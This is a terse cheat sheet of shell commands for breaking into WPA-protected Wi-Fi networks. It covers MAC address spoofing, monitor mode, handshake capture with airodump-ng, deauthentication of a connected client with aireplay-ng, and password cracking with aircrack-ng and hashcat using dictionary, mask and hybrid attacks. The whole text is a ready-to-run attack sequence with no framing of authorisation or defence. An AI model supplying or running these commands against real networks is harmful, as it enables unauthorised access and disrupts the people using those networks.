MAC changer:
sudo macchanger --mac=12:34:56:78:9a:bc wlan0
Start monitor mode:
sudo airmon-ng start wlan0
Get BSSID:
sudo airodump-ng wlan0mon
Dump handshake packets (channel = 7, BSSID = aa:bb:cc:dd:ee:ff):
sudo airodump-ng -c 7 --bssid aa:bb:cc:dd:ee:ff -w test wlan0mon
Deauth target:
sudo aireplay-ng -0 10 -a aa:bb:cc:dd:ee:ff -c 11:22:33:44:55:66 wlan0mon
Aircrack by dictionary:
sudo aircrack-ng -w ~/pw/pw_list.txt ~/test.cap
Convert to hc22000 format:
https://hashcat.net/cap2hashcat/
Hashcat by dictionary:
hashcat -m 22000 test.hc22000 ~/pw/pw_list.txt
Hashcat by brute force:
For example, eight lowercase characters (?l = one lowercase letter). To step the mask length instead of fixing it, add the increment options: -i --increment-min 8 --increment-max 12
hashcat -a 3 -m 22000 -i test.hc22000 ?l?l?l?l?l?l?l?l
Hashcat by custom pattern mixed with dictionary:
hashcat -m 22000 -i -a 6 test.hc22000 ~/pw/pw_list.txt ?d?d?d?d